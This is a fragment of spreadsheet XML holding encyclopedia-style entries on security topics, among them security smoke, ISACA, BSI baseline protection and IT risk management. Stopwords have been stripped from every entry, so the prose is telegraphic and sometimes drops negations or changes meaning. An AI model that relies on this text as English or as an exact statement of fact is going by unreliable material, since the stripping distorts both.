marketplace "csp progress" moderate level, supports compliance itar.all keeper's products systems undergo periodic penetration testing third-party experts, including group, secarma, cybertest, independent security researchers.keeper fips 140-2 validated, first company space achieve validation. also list password managers cryptography references external links official website</t>
  </si>
  <si>
    <t>Security smoke</t>
  </si>
  <si>
    <t>security smoke thermally generated white fog, aimed inhibiting intruders accessing items steal, much used storage high-value goods, recommended police insurers. consists glycol glycerine mixed distilled water, vaporises condenses air. history market using security smoke theft prevention tool came increase ability thieves circumvent existing physical security measures, often simply raising level violence utilised gain entry. burglar alarms often delay several minutes police private security able respond, meaning well organised criminal period time enter take like. closed-circuit television recording devices nullified thieves routinely hide identities. security smoke market developed alternative security method, designed deter entry, prevent loss thief gain access. first security smoke system designed, manufactured installed concept engineering 1974 protect gold bullion specialised vaults. 1993 concept launched smoke screen range, first commercial security smoke system designed manufactured 9000. composition smoke smoke "simulant", usually glycol glycerine mixed distilled water, vaporised condensed free produce distinctive smoke-like effect. particles produced average 0.2-2.0 micrometres diameter, meaning settles slowly (and therefore excellent longevity). this also means residue contamination highly unlikely. applications security smoke systems employed wide variety industries, including banks, jewellers, retail premises, cash-handling chains, offices private homes. often businesses turned security smoke systems other, traditional, security methods failed prevent repeated break-ins stock loss. estimated january 2010 100,000 premises using security smoke systems protecting high-value products security smoke systems successfully used protect high-value items opportunistic smash grab style raids, example jewellers' window displays. major retailers, aurum holdings owner mappin webb, goldsmiths watches switzerland installed security smoke systems seen dramatic decrease losses break-ins. cash handling chains security smoke machines successfully used protecting personnel currency delivery collection cash. introduction portable security smoke generator awarded best physical product ifsec 2009, providing cash-carriers high-level protection increased risk hours cash deliveries. endorsement crime prevention organisations guidelines association chief police officers approve security smoke devices, acpo secured design accreditation scheme endorses certain manufacturers security smoke systems. insurers also recommend security smoke approved method reducing stock loss deterring break-ins. safety considerations primary concerns raised possibility contamination premises, stock personal possessions generated fog. independent tests performed atomic energy authority molecular profiles behalf concept smoke screen ltd) shown well-installed, properly maintained security smoke systems leave residue, security smoke installers offer guarantee this. alternative concerns suggest smoke cause intruders panic staff risk. minimise risk, great deal care taken selecting smoke generators installed. security smoke european standard en50131-8, specifically states must used create mantrap.another safety consideration ejection nozzle machine become blocked. some products incorporate audible alarm event nozzle blockage. references</t>
  </si>
  <si>
    <t>Security software</t>
  </si>
  <si>
    <t>IQinVision</t>
  </si>
  <si>
    <t>iqinvision manufacturer network cameras, cameras, network video recording (nvr) systems. company founded 1998. company headquartered juan capistrano, california, offices lancaster, pennsylvania utrecht, netherlands.iqinvision brands cameras term “iqeye” cameras produces stand-alone surveillance systems integrate systems software developer’s full-custom applications. example, iqeye camera integrate many popular third party network video recorder applications companies like aimetis, genetec, milestone, onssi, mirasys many others. iqinvision brands megapixel cameras name well models. company history iqinvision began technology merger engineering services firm, gordian technologies, gordian's customer's, small startup company called "visiqn" (literally 'iq' within word "vision" replacing designed intelligent network cameras surveillance industry. company founded 1998 design, manufacture market line megapixel/hd cameras. company changed name "iqinvision" early avoid confusion.the company offices juan capistrano amsterdam.in january 2011, company held first partner conference iqsummit. conference, company gave updates iqinvision discussed future megapixel surveillance networked security video.in june 2013, charles chestnutt officially appointed company's president ceo. charles serving since january 2012, company's interim chief executive officer.in march 2014, iqinvision merged vicon industries, another company also specializes digital surveillance. also professional video closed-circuit television (cctv) closed-circuit television camera video content analysis digital video recorder camera physical security references external links official website</t>
  </si>
  <si>
    <t>Security operations center</t>
  </si>
  <si>
    <t>security operations center (soc) centralized unit deals security issues organizational technical level. comprises three building blocks managing enhancing organization's security posture: people, processes, technology. thereby, governance compliance provide framework, tying together building blocks. within building facility central location staff supervises site, using data processing technology. typically, equipped access monitoring, controlling lighting, alarms, vehicle barriers. information security operations center (isoc) dedicated site enterprise information systems (web sites, applications, databases, data centers servers, networks, desktops endpoints) monitored, assessed, defended. united states government transportation security administration united states implemented security operations centers airports federalized security. primary function security operations centers communication security personnel, enforcement, airport personnel various agencies involved daily operations airports. socs staffed 24-hours watch officers. security operations center watch officers trained aspects airport aviation security often required work abnormal shifts. watch officers also ensure personnel follow proper protocol dealing airport security operations. usually first notified incidents airports discovery prohibited items/contraband, weapons, explosives, hazardous materials well incidents regarding flight delays, unruly passengers, injuries, damaged equipment various types potential security threats. turn relays information pertaining incidents federal security directors, enforcement headquarters. also national sigint operations centre references</t>
  </si>
  <si>
    <t>ISACA</t>
  </si>
  <si>
    <t>isaca international professional association focused (information technology) governance. filings, known information systems audit control association, although isaca goes acronym only. isaca currently offers certification program well micro-certificates. history isaca originated united states 1967, group individuals working auditing controls computer systems started become increasingly critical operations organizations. they identified need centralized source information guidance field. 1969, stuart tyrnauer, employee (later) douglas aircraft company, incorporated group auditors association (edpaa). tyrnauer served body's founding chairman first three years. 1976 association formed education foundation undertake large-scale research efforts expand knowledge value accorded fields governance control information technology. association became information systems audit control association 1994.by 2008 organization dropped long title branded isaca.in march 2016, isaca bought cmmi institute behind capability maturity model integration.in january 2020, isaca updated refreshed look digital presence, introducing logo. current status isaca currently serves 140,000 constituents (members professionals holding isaca certifications) countries. titles members auditor, consultant, educator, security professional, regulator, chief information officer, chief information security officer internal auditor. they work nearly industry categories. there network isaca chapters chapters established countries. chapters provide education, resource sharing, advocacy, networking benefits. major publications cobit information system control journal risk standards, guidelines procedures information system auditing (guideline co-developed international federation accountants) security, audit control features (getting best value investments) certifications certified information systems auditor (cisa,1978) certified information security manager (cism, 2002) certified governance enterprise (cgeit, 2007) certified risk information systems control (crisc, 2010) cybersecurity practitioner certification (csx-p, 2015) certified data privacy solutions engineer (cdpse, 2020) information technology certified associate (itca, 2021) certified emerging technology (cet, 2021)the csx-p, isaca's first cybersecurity certification, introduced summer 2015. certifications require individual work live environment, real problems, obtain certification. specifically, exam puts test takers live network real incident taking place. student's efforts respond incident problem results type score awarded. certificates cobit certificates risk fundamentals certificate certificate cloud auditing knowledge nexus cybersecurity certificates cybersecurity audit certificate program computing fundamentals certificate networks infrastructure fundamentals certificate cybersecurity fundamental certificate software development fundamentals certificate data science fundamentals certificate also information security information security management system risk cobit committee sponsoring organizations treadway commission (coso) (isc)² information systems security association list international professional associations references external links isaca official webpage official isaca webpage</t>
  </si>
  <si>
    <t>ISO 15292</t>
  </si>
  <si>
    <t>15292, "information technology security techniques protection profile registration procedures" establishes international registry (operated afnor) protection profiles packages used computer security evaluation common criteria framework. format profiles packages specified 15408. 15292 assigns registered protection profiles packages labels form: "entry type-registration year-registration number", example pp-2003-0001. external links link store page document, retrieved august 2008.</t>
  </si>
  <si>
    <t>ISO 19092-2</t>
  </si>
  <si>
    <t>19092 financial services biometrics part message syntax cryptographic requirements standard describes techniques, protocols, cryptographic requirements, syntax using biometrics identification verification mechanism wide variety security applications financial industry. this standard provides support policy based matching decisions remote authentication allows biometrics used securely 8583 retail transaction messaging standard. secure review audit event journal syntax provided allows many security controls specified 19092-1 implemented.</t>
  </si>
  <si>
    <t>ISheriff</t>
  </si>
  <si>
    <t>isheriff (formerly internet sheriff) internet security software vendor specializes cloud-based security compliance, specialties e-mail filtering, filters endpoint security. company privately held based redwood city, california. isheriff sells products partners distributors. history founded brisbane, australia 1999 oscar marquez, isheriff products focused content filtering, email filtering software appliances. 2009 company moved products cloud computing service model. isheriff services include e-mail filtering, filtering, email archiving, e-mail encryption security reporting. company holds patent data modeling engine based bayesian spam filtering principals. 2006, isheriff provided internet filtering software tasmanian government's first statewide trial anti-pornography filters children.in july 2012, total defense, inc., provider cybercrime-fighting technology, announced acquired isheriff. april 2014, total defense announced that, conjunction sale consumer business unit untangle, re-branded isheriff. isheriff’s cloud security suite email security archiving cloud-based anti-spam, email security email archiving, removing incoming email spam, providing clean email connection secures viruses, unwanted content data leakage, well cloud-based archiving. security cloud-based content malware filtering, providing secure internet browsing, enforcement acceptable policies data leak protection. endpoint security cloud-based platform multi-layer anti-malware approach protects malware, secures controls applications used users protects threats removable media. references external links corporate website</t>
  </si>
  <si>
    <t>IT baseline protection</t>
  </si>
  <si>
    <t>baseline protection (german: it-grundschutz) approach german federal office information security (bsi) methodology identify implement computer security measures organization. achievement adequate appropriate level security systems. reach goal recommends "well-proven technical, organizational, personnel, infrastructural safeguards". organizations federal agencies show systematic approach secure systems (e.g. information security management system) obtaining iso/iec 27001 certificate basis it-grundschutz. overview baseline security term baseline security signifies standard security measures typical systems. used various contexts somewhat different meanings. example: microsoft baseline security analyzer: software tool focused microsoft operating system services security cisco security baseline: vendor recommendation focused network network device security controls nortel baseline security: requirements best practices focus network operators iso/iec 13335-3 defines baseline approach risk management. this standard replaced iso/iec 27005, baseline approach taken 2700x series. there numerous internal baseline security policies organizations, german comprehensive baseline security standard, compliant iso/iec 27000-series baseline protection foundation baseline protection concept initially detailed risk analysis. proceeds overall hazards. consequently, sophisticated classification according damage extent probability occurrence ignored. three protection needs categories established. with help, protection needs object investigation determined. based these, appropriate personnel, technical, organizational infrastructural security measures selected baseline protection catalogs. federal office security information technology's baseline protection catalogs offer "cookbook recipe" normal level protection. besides probability occurrence potential damage extents, implementation costs also considered. using baseline protection catalogs, costly security analyses requiring expert knowledge dispensed with, since overall hazards worked beginning. possible relative layman identify measures taken implement cooperation professionals. grants baseline protection certificate confirmation successful implementation baseline protection. stages based self declaration. stage independent, bsi-licensed auditor completes audit. certification process internationalization possible since 2006. iso/iec 27001 certification occur simultaneously baseline protection certification. (the iso/iec 27001 standard successor 7799-2). this process based security standards. this process carries development price prevailed time. corporations certified 7799-2 standard obliged carry risk assessment. make comfortable, deviate protection needs analysis pursuant baseline protection catalogs. advantage conformity strict bsi, also attainment 7799-2 certification. beyond this, offers help aids like policy template gstool. data protection component available, produced cooperation german federal commissioner data protection freedom information state data protection authorities integrated baseline protection catalog. this component considered, however, certification process. baseline protection process following steps taken pursuant baseline protection process structure analysis protection needs analysis: network defined. structure analysis carried out. protection needs determination carried out. baseline security check carried out. baseline protection measures implemented.creation occurs following steps: structure analysis (survey) assessment protection needs selection actions running comparison nominal actual. structure analysis network includes totality infrastructural, organizational, personnel, technical components serving fulfillment task particular information processing application area. network thereby encompass entire character institution individual division, partitioned organizational structures example, departmental network, shared applications, example, personnel information system. necessary analyze document information technological structure question generate security concept especially apply baseline protection catalogs. today's usually heavily networked systems, network topology plan offers starting point analysis. following aspects must taken consideration: available infrastructure, organizational personnel framework network, networked non-networked systems employed network. communications connections systems externally, applications within network. protection needs determination purpose protection needs determination investigate protection sufficient appropriate information information technology use. connection, damage application processed information, could result breach confidentiality, integrity availability, considered. important context realistic assessment possible follow-on damages. division three protection needs categories "low medium", "high" "very high" proved value. "public", "internal" "secret" often used confidentiality. modelling heavily networked systems typically characterize information technology government business days. rule, therefore, advantageous consider entire system individual systems within scope security analysis concept. able manage task, makes sense logically partition entire system parts separately consider part even network. detailed documentation structure prerequisite baseline protection catalogs network. this achieved, example, structure analysis described above. baseline protection catalogs' components must ultimately mapped onto components network question modelling step. baseline security check baseline security check organisational instrument offering quick overview prevailing security level. with help interviews, status existing network modelled baseline protection) relative number security measures implemented baseline protection catalogs investigated. result catalog implementation status "dispensable", "yes", "partly", "no" entered relevant measure. identifying yet, partially, implemented measures, improvement options security information technology question highlighted. baseline security check gives information measures, still missing (nominal actual comparison). from follows remains done achieve baseline protection security. measures suggested baseline check need implemented. peculiarities taken account! could several less unimportant applications running server, lesser protection needs. totality, however, applications provided higher level protection. this called (cumulation effect). applications running server determine need protection. several applications system. when occurs, application greatest need protection determines systems protection category. conversely, conceivable application great protection needs automatically transfer system. this happen system configured redundantly, inconsequential part running this called (distribution effect). this case, example, clusters. baseline security check maps baseline protection measures. this level suffices medium protection needs. this comprises systems according estimates. systems high high protection needs, risk analysis-based information security concepts, like example iso/iec 27000-series standards, usually used. baseline protection catalog standards during 2005 restructuring expansion baseline protection catalogs, separated methodology baseline protection catalog. 100-1, 100-2, 100-3 standards contain information construction information security management system (isms), methodology basic protection approach, creation security analysis elevated elevated protection needs building completed baseline protection investigation. 100-4, "emergency management" standard, currently preparation. contains elements 25999, itil service continuity management combined relevant baseline protection catalog components, essential aspects appropriate business continuity management (bcm). implementing standards renders certification possible pursuant 25999-2. submitted 100-4 standards design online commentary under.the brings standards line international norms like iso/iec 27001 way. literature bsi:it baseline protection guidelines (pdf, bsi: baseline protection cataloge 2007 (pdf) bsi: security management baseline protection standards frederik humpert: it-grundschutz umsetzen gstool. anleitungen praxistipps erfolgreichen einsatz bsi-standards, carl hanser verlag münchen, 2005. (isbn 3-446-22984-1) norbert pohlmann, hartmut blumberg: it-sicherheitsleitfaden. pflichtenheft implementierung it-sicherheitsstandards unternehmen, isbn 3-8266-0940-9 references external links federal office information security security yellow pages baseline protection tools open security architecture- controls patterns secure systems</t>
  </si>
  <si>
    <t>IT risk management</t>
  </si>
  <si>
    <t>risk management application risk management methods information technology order manage risk, i.e.: business risk associated use, ownership, operation, involvement, influence adoption within enterprise organizationit risk management considered component wider enterprise risk management system.the establishment, maintenance continuous update information security management system (isms) provide strong indication company using systematic approach identification, assessment management information security risks.different methodologies proposed manage risks, divided processes steps.according risk framework, encompasses negative impact operations service delivery bring destruction reduction value organization, also benefit enabling risk associated missing opportunities technology enable enhance business project management aspects like overspending late delivery adverse business impact.because risk strictly tied uncertainty, decision theory applied manage risk science, i.e. rationally making choices uncertainty. generally speaking, risk product likelihood times impact (risk likelihood impact).the measure risk determined product threat, vulnerability asset values: risk threat vulnerability asset {\displaystyle {\text{risk}}={\text{threat}}\times {\text{vulnerability}}\times {\text{asset}}} current risk management framework risk would framework: risk vulnerability threat counter measure asset value risk {\displaystyle {\text{risk}}=(({\text{vulnerability}}\times {\text{threat}})/{\text{counter measure}})\times {\text{asset value risk}}} process risk management ongoing iterative process. must repeated indefinitely. business environment constantly changing threats vulnerabilities emerge every day. choice countermeasures (controls) used manage risks must strike balance productivity, cost, effectiveness countermeasure, value informational asset protected. definitions certified information systems auditor review manual 2006 produced isaca, international professional association focused governance, provides following definition risk management: "risk management process identifying vulnerabilities threats information resources used organization achieving business objectives, deciding countermeasures, any, take reducing risk acceptable level, based value information resource organization."risk management process allows managers balance operational economic costs protective measures achieve gains mission capability protecting systems data support organizations’ missions. this process unique environment; indeed pervades decision-making areas daily lives.the head organizational unit must ensure organization capabilities needed accomplish mission. these mission owners must determine security capabilities systems must provide desired level mission support face real world threats. most organizations tight budgets security; therefore, security spending must reviewed thoroughly management decisions. well-structured risk management methodology, used effectively, help management identify appropriate controls providing mission-essential security capabilities. risk management world quite complex, multi faced activity, relations complex activities. picture right shows relationships different related terms. american national information assurance training education center defines risk management field total process identify, control, minimize impact uncertain events. objective risk management program reduce risk obtain maintain approval. process facilitates management security risks level management throughout system life cycle. approval process consists three elements: risk analysis, certification, approval. element managerial science concerned identification, measurement, control, minimization uncertain events. effective risk management program encompasses following four phases: risk assessment, derived evaluation threats vulnerabilities. management decision. control implementation. effectiveness review. total process identifying, measuring, minimizing uncertain events affecting resources. includes risk analysis, cost benefit analysis, safeguard selection, security test evaluation, safeguard implementation, systems review. total process identifying, controlling, eliminating minimizing uncertain events affect system resources. includes risk analysis, cost benefit analysis, selection, implementation test, security evaluation safeguards, overall security review. risk management part enterprise risk management some organizations many others comprehensive enterprise risk management (erm) place. four objective categories addressed, according committee sponsoring organizations treadway commission (coso) are: strategy high-level goals, aligned supporting organization's mission operations effective efficient resources financial reporting reliability operational financial reporting compliance compliance applicable laws regulationsaccording risk framework isaca, risk transversal four categories. risk managed framework enterprise risk management: risk appetite risk sensitivity whole enterprise guide risk management process. provide context business objectives risk management risk management methodology whilst methodology describe specific methods nevertheless specify several processes (constitute generic framework) need followed. these processes broken sub-processes, combined, sequence change. risk management exercise must carry processes form another, following table compares processes foreseen three leading standards. isaca risk framework recent. risk practitioner-guide compares risk 27005. term methodology means organized principles rules drive action particular field knowledge.the overall comparison illustrated following table. probabilistic nature need cost benefit analysis, risks managed following process according nist 800-30 divided following steps: risk assessment, risk mitigation, evaluation assessment.effective risk management must totally integrated systems development life cycle.information risk analysis conducted applications, computer installations, networks systems development undertaken using structured methodologies. context establishment this step first step iso/iec 27005 framework. most elementary activities foreseen first process risk assessment according nist 800–30. this step implies acquisition relevant information organization determination basic criteria, purpose, scope boundaries risk management activities organization charge risk management activities. purpose usually compliance legal requirements provide evidence diligence supporting isms certified. scope incident reporting plan, business continuity plan. another area application certification product. criteria include risk evaluation, risk acceptance impact evaluation criteria. these conditioned legal regulatory requirements strategic value business information processes stakeholder expectations negative consequences reputation organizationestablishing scope boundaries, organization studied: mission, values, structure; strategy, locations cultural environment. constraints (budgetary, cultural, political, technical) organization collected documented guide next steps. organization security management organization charge risk management foreseen partially fulfilling requirement provide resources needed establish, implement, operate, monitor, review, maintain improve isms. main roles inside organization are: senior management chief information officer (cio) system information owners, chief data officer (cdo) chief privacy officer (cpo) business functional managers information system security officer (isso) chief information security officer (ciso) security practitioners security awareness trainers risk assessment risk management recurrent activity deals analysis, planning, implementation, control, monitoring implemented measurements enforced security policy. contrary, risk assessment executed discrete time points (e.g. year, demand, etc.) performance next assessment provides temporary view assessed risks parameterizing entire risk management process. this view relationship risk management risk assessment depicted figure adopted octave.risk assessment often conducted iteration, first high-level assessment identify high risks, iterations detailed analysis major risks risks. according national information assurance training education center risk assessment field study vulnerabilities, threats, likelihood, loss impact, theoretical effectiveness security measures. managers results risk assessment develop security requirements specifications. process evaluating threats vulnerabilities, known postulated, determine expected loss establish degree acceptability system operations. identification specific facility's assets, threats assets, facility's vulnerability threats. analysis system assets vulnerabilities establish expected loss certain events based estimated probabilities occurrence events. purpose risk assessment determine countermeasures adequate reduce probability loss impact loss acceptable level. management tool provides systematic approach determining relative value sensitivity computer installation assets, assessing vulnerabilities, assessing loss expectancy perceived risk exposure levels, assessing existing protection features additional protection alternatives acceptance risks documenting management decisions. decisions implementing additional protection features normally based existence reasonable ratio cost/benefit safeguard sensitivity/value assets protected. risk assessments vary informal review small scale microcomputer installation formal fully documented analysis risk analysis) large scale computer installation. risk assessment methodologies vary qualitative quantitative approaches combination approaches. 27005 framework risk assessment receives input output previous step context establishment; output list assessed risks prioritized according risk evaluation criteria. process divided following steps: risk analysis, divided risk identification risk estimation risk evaluationthe following table compares 27005 processes risk framework processes: iso/iec 27002:2005 code practice information security management recommends following examined risk assessment: security policy, organization information security, asset management, human resources security, physical environmental security, communications operations management, access control, information systems acquisition, development maintenance, (see systems development life cycle) information security incident management, business continuity management, regulatory compliance. risk identification risk identification states could cause potential loss; following identified: assets, primary (i.e. business processes related information) supporting (i.e. hardware, software, personnel, site, organization structure) threats existing planned security measures vulnerabilities consequence related business processesthe output process made list asset related business processes risk managed associated list threats, existing planned security measures list vulnerabilities unrelated identified threats list incident scenarios consequences. risk estimation there methods risk assessment information security field, quantitative qualitative.purely quantitative risk assessment mathematical calculation based security metrics asset (system application). risk scenario, taking consideration different risk factors single loss expectancy (sle) determined. then, considering probability occurrence given period basis, example annual rate occurrence (aro), annualized loss expectancy determined product sle. important point values assets considered involved assets, value directly affected resource. example, consider risk scenario laptop theft threat, consider value data related asset) contained computer reputation liability company (other assets) deriving loss availability confidentiality data could involved. easy understand intangible assets (data, reputation, liability) worth much physical resources risk (the laptop hardware example). intangible asset value huge, easy evaluate: consideration pure quantitative approach.qualitative risk assessment (three five steps evaluation, very high low) performed organization requires risk assessment performed relatively short time meet small budget, significant quantity relevant data available, persons performing assessment sophisticated mathematical, financial, risk assessment expertise required. qualitative risk assessment performed shorter period time less data. qualitative risk assessments typically performed interviews sample personnel relevant groups within organization charged security asset assessed. qualitative risk assessments descriptive versus measurable. usually qualitative classification done followed quantitative evaluation highest risks compared costs security measures. risk estimation input output risk analysis split following steps: assessment consequences valuation assets assessment likelihood incident (through threat vulnerability valuation) assign values likelihood consequence risksthe output list risks value levels assigned. documented risk register. risks arising security threats adversary attacks particularly difficult estimate. this difficulty made worse because, least system connected internet, adversary intent capability attack physical closeness access necessary. some initial models proposed problem.during risk estimation generally three values given asset, loss properties: confidentiality, integrity, availability. risk evaluation risk evaluation process receives input output risk analysis process. compares risk level risk acceptance criteria prioritise risk list risk treatment indications. nist framework determine likelihood future adverse event, threats system must conjunction potential vulnerabilities controls place system. impact refers magnitude harm could caused threat's exercise vulnerability. level impact governed potential mission impacts produces relative value assets resources affected (e.g., criticality sensitivity system components data). risk assessment methodology encompasses nine primary steps: step system characterization step threat identification step vulnerability identification step control analysis step likelihood determination step impact analysis step risk determination step control recommendations step results documentation risk mitigation risk mitigation, second process according 800–30, third according 27005 risk management, involves prioritizing, evaluating, implementing appropriate risk-reducing controls recommended risk assessment process. because elimination risk usually impractical close impossible, responsibility senior management functional business managers least-cost approach implement appropriate controls decrease mission risk acceptable level, minimal adverse impact organization's resources mission. 27005 framework risk treatment process selecting security measures reduce retain avoid transferrisk produce risk treatment plan, output process residual risks subject acceptance management. there list select appropriate security measures, single organization choose appropriate according business strategy, constraints environment circumstances. choice rational documented. importance accepting risk costly reduce high fact risk acceptance considered separate process.risk transfer apply risk high impact easy reduce significantly likelihood means security controls: insurance premium compared mitigation costs, eventually evaluating mixed strategy partially treat risk. another option outsource risk somebody efficient manage risk.risk avoidance describe action ways conducting business changed avoid risk occurrence. example, choice storing sensitive information customers avoidance risk customer data stolen. residual risks, i.e. risk remaining risk treatment decision taken, estimated ensure sufficient protection achieved. residual risk unacceptable, risk treatment process iterated. nist framework risk mitigation systematic methodology used senior management reduce mission risk. risk mitigation achieved following risk mitigation options: risk assumption. accept potential risk continue operating system implement controls lower risk acceptable level risk avoidance. avoid risk eliminating risk cause and/or consequence (e.g., forgo certain functions system shut system risks identified) risk limitation. limit risk implementing controls minimize adverse impact threat's exercising vulnerability (e.g., supporting, preventive, detective controls) risk planning. manage risk developing risk mitigation plan prioritizes, implements, maintains controls research acknowledgement. lower risk loss acknowledging vulnerability flaw researching controls correct vulnerability risk transference. transfer risk using options compensate loss, purchasing insurance.address greatest risks strive sufficient risk mitigation lowest cost, minimal impact mission capabilities: suggestion contained risk communication risk communication horizontal process interacts bidirectionally processes risk management. purpose establish common understanding aspect risk among organization's stakeholder. establishing common understanding important, since influences decisions taken. risk reduction overview method specifically designed process. presents comprehensible overview coherence risks, measures residual risks achieve common understanding. risk monitoring review risk management ongoing, never ending process. within process implemented security measures regularly monitored reviewed ensure work planned changes environment rendered ineffective. business requirements, vulnerabilities threats change time. regular audits scheduled conducted independent party, i.e. somebody control responsible implementations daily management isms. evaluation assessment security controls validated. technical controls possible complex systems tested verified. hardest part validate people knowledge procedural controls effectiveness real application daily business security procedures.vulnerability assessment, internal external, penetration test instruments verifying status security controls. information technology security audit organizational procedural control evaluating security. systems organization evolving quite rapidly. risk management cope changes change authorization risk evaluation affected systems processes periodically review risks mitigation actions.monitoring system events according security monitoring strategy, incident response plan security validation metrics fundamental activities assure optimal level security obtained. important monitor vulnerabilities, apply procedural technical security controls like regularly updating software, evaluate kinds controls deal zero-day attacks. attitude involved people benchmark best practice follow seminars professional associations sector factors assure state organization risk management practice. integrating risk management system development life cycle effective risk management must totally integrated sdlc. system's sdlc five phases: initiation, development acquisition, implementation, operation maintenance, disposal. risk management methodology regardless sdlc phase assessment conducted. risk management iterative process performed major phase sdlc. nist 800-64 devoted topic. early integration security sdlc enables agencies maximize return investment security programs, through: early identification mitigation security vulnerabilities misconfigurations, resulting lower cost security control implementation vulnerability mitigation; awareness potential engineering challenges caused mandatory security controls; identification shared security services reuse security strategies tools reduce development cost schedule improving security posture proven methods techniques; facilitation informed executive decision making comprehensive risk management timely manner.this guide focuses information security components sdlc. first, descriptions security roles responsibilities needed information system developments provided. second, sufficient information sdlc provided allow person unfamiliar sdlc process understand relationship information security sdlc. document integrates security steps linear, sequential (a.k.a. waterfall) sdlc. five-step sdlc cited document example method development intended mandate methodology. lastly, 800-64 provides insight projects initiatives clearly defined sdlc-based developments, service-oriented architectures, cross-organization projects, facility developments. security incorporated information systems acquisition, development maintenance implementing effective security practices following areas. security requirements information systems correct processing applications cryptographic controls security system files security development support processes technical vulnerability managementinformation systems security begins incorporating security requirements process application system enhancement. security designed system beginning. security requirements presented vendor requirements phase product purchase. formal testing done determine whether product meets required security specifications prior purchasing product. correct processing applications essential order prevent errors mitigate loss, unauthorized modification misuse information. effective coding techniques include validating input output data, protecting message integrity using encryption, checking processing errors, creating activity logs. applied properly, cryptographic controls provide effective mechanisms protecting confidentiality, authenticity integrity information. institution develop policies encryption, including proper management. disk encryption protect data rest. data transit protected alteration unauthorized viewing using certificates issued certificate authority implemented public infrastructure. system files used applications must protected order ensure integrity stability application. using source code repositories version control, extensive testing, production back-off plans, appropriate access program code effective measures used protect application's files. security development support processes essential part comprehensive quality assurance production control process, would usually involve training continuous oversight experienced staff. applications need monitored patched technical vulnerabilities. procedures applying patches include evaluating patches determine appropriateness, whether successfully removed case negative impact. critique risk management methodology risk management scientific methodology criticized shallow. major risk management programmes large organizations, mandated federal information security management act, criticized. avoiding complexity accompanies formal probabilistic model risks uncertainty, risk management looks like process attempts guess rather formally predict future basis statistical evidence. highly subjective assessing value assets, likelihood threats occurrence significance impact. however, better deal subject emerged. risk managements methods quite hard list methods least partially support risk management process. efforts direction done nist description automated risk management packages that nist/ncsc risk management research laboratory examined, updated 1991 enisa 2006; list methods tools available line comparison engine. among widely used are:cramm developed british government compliant iso/iec 17799, gramm–leach–bliley (glba) health insurance portability accountability (hipaa) ebios developed french government compliant major security standards: iso/iec 27001, iso/iec 13335, iso/iec 15408, iso/iec 17799 iso/iec 21287 standard good practice developed information security forum (isf) mehari developed clusif club sécurité l'information français risk framework developed risk institute octave developed carnegie mellon university, (software engineering institute) operationally critical threat, asset, vulnerability evaluation (octavesm) approach defines risk-based strategic assessment planning technique security. it-grundschutz baseline protection manual) developed federal office information security (bsi) (germany); it-grundschutz provides method organization establish information security management system (isms). comprises generic security recommendations establishing applicable security process detailed technical recommendations achieve necessary security level specific domainenisa report classified different methods regarding completeness, free availability, tool support; result that: ebios, methods, it-grundschutz cover deeply aspects (risk identification, risk analysis, risk evaluation, risk assessment, risk treatment, risk acceptance, risk communication), ebios it-grundschutz ones freely available ebios open source tool support it.the factor analysis information risk (fair) main document, introduction factor analysis information risk (fair)", risk management insight llc, november 2006; outline methods lack rigorous definition risk factors. fair another methodology deal risk management, complements existing methodologies.fair good acceptance, mainly open group isaca. isaca developed methodology, called risk address various kind related risks, chiefly security related risks. integrated cobit, general framework manage risk broader concept risk methodologies, encompasses negative impact operations service delivery bring destruction reduction value organization, also benefit\value enabling risk associated missing opportunities technology enable enhance business project management aspects like overspending late delivery adverse business impact.the "build security initiative homeland security department united states, cites fair. initiative build security collaborative effort provides practices, tools, guidelines, rules, principles, resources software developers, architects, security practitioners build security software every phase development. chiefly address secure coding. 2016, threat sketch launched abbreviated cyber security risk assessment specifically small organizations. methodology uses real options forecast prioritize fixed list high-level threats. data privacy legislation continue evolve focus 'reasonable security' sensitive information risk management. goal ensure organizations establish duty care comes managing data. businesses responsible understand risk posture prevent foreseeable harm reasonable safeguards based specific working environment. standards there number standards risk risk management. description main article. laws also references external links internet2 information security guide: effective practices solutions higher education risk management principles inventories risk management risk assessment methods tools, publication date: 2006 authors:conducted technical department enisa section risk management clusif club sécurité l'information français 800-30 nist risk management guide 800-39 nist draft managing risk information systems: organizational perspective fips publication 199, standards security categorization federal information information fips publication minimum security requirements federal information information systems 800-37 nist guide applying risk management framework federal information systems: security life cycle approach fismapedia collection documents discussions focused federal security anderson, "intelligence-based threat assessments information networks infrastructures: white paper", 2005. danny lieberman, "using practical threat modeling quantitative approach data security", 2009</t>
  </si>
  <si>
    <t>IT risk</t>
  </si>
  <si>
    <t>information technology risk, risk, it-related risk, cyber risk risk related information technology. while information long appreciated valuable important asset, rise knowledge economy digital revolution organizations becoming increasingly dependent information, information processing especially various events incidents compromise therefore cause adverse impacts organization's business processes mission, ranging inconsequential catastrophic scale. assessing probability likelihood various types event/incident predicted impacts consequences, occur, common assess measure risks. alternative methods measuring risk typically involve assessing contributory factors threats, vulnerabilities, exposures, asset values. definitions risk: potential given threat exploit vulnerabilities asset group assets thereby cause harm organization. measured terms combination probability occurrence event consequence. committee national security systems committee national security systems united states america defined risk different documents: from cnss instruction 4009 dated april 2010 basic technical focused definition: risk possibility particular threat adversely impact exploiting particular vulnerability. national security telecommunications information systems security instruction (nstissi) 1000, introduces probability aspect, quite similar nist 800-30 one: risk combination likelihood threat occur, likelihood threat occurrence result adverse impact, severity resulting impactnational information assurance training education center defines risk field loss potential exists result threat-vulnerability pairs. reducing either threat vulnerability reduces risk. uncertainty loss expressed terms probability loss. probability hostile entity successfully exploit particular telecommunications comsec system intelligence purposes; factors threat vulnerability. combination likelihood threat shall occur, likelihood threat occurrence shall result adverse impact, severity resulting adverse impact. probability particular threat exploit particular vulnerability system. nist many nist publications define risk context different publications: fismapedia term provide list. between them: according nist 800-30:risk function likelihood given threat-source’s exercising particular potential vulnerability, resulting impact adverse event organization. from nist fips 200risk level impact organizational operations (including mission, functions, image, reputation), organizational assets, individuals resulting operation information system given potential impact threat likelihood threat occurring.nist 800-30 defines: it-related risk mission impact considering: probability particular threat-source exercise (accidentally trigger intentionally exploit) particular information system vulnerability resulting impact occur. it-related risks arise legal liability mission loss unauthorized (malicious accidental) disclosure, modification, destruction information unintentional errors omissions disruptions natural man-made disasters failure exercise care diligence implementation operation system. risk management insight risk probable frequency probable magnitude future loss. isaca isaca published risk framework order provide end-to-end, comprehensive view risks related there, risk defined business risk associated use, ownership, operation, involvement, influence adoption within enterpriseaccording risk risk broader meaning: encompasses negative impact operations service delivery bring destruction reduction value organization, also benefit\value enabling risk associated missing opportunities technology enable enhance business project management aspects like overspending late delivery adverse business impact measuring risk can't effectively consistently manage can't measure, can't measure defined.measuring risk cyber risk) occur many levels. business 